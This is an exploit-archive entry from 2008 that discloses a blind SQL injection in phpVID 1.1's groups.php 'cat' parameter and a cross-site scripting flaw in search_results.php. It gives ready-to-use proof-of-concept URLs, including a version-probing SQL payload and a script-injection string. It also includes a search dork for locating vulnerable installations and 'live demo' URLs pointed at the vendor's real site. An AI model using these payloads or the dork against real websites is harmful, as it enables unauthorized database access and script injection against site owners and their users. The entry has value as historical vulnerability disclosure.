phpVID 1.1 (XSS/SQL) Multiple Remote Vulnerabilities

2008-09-10T00:00:00
ID 1337DAY-ID-3639
Type zdt
Reporter r45c4l
Modified 2008-09-10T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================
phpVID 1.1 (XSS/SQL) Multiple Remote Vulnerabilities
====================================================


################################################################ 
# 
# Title: phpVID 1.1 The video sharing script! Multiple Vulnerabilities
#
# Vendor: http://www.vastal.com/phpvid-the-video-sharing-software.html
# Vulnerable Version: 1.1
# 
###########################################################
#
# d0rk:Powered By Vastal I-Tech's phpVID. 
# 
# 
###########################################################
 
     Vulnerabilities

     Blind SQL Injection in "groups.php" in the "cat" parameter.
     Cross Site Scripting in "search_results.php"
  
     
     POC:  
	http://www.site.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4 
	http://www.site.com/search_results.php?query=[XSS] 

     
     Live Demo: 
	http://www.phpvid.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4
	http://www.phpvid.com/search_results.php?query=<script>alert(0);</script>


###########################################################
#
#  Bug discovered : 10 Sep.2008
###########################################################




#  0day.today [2016-04-20]  #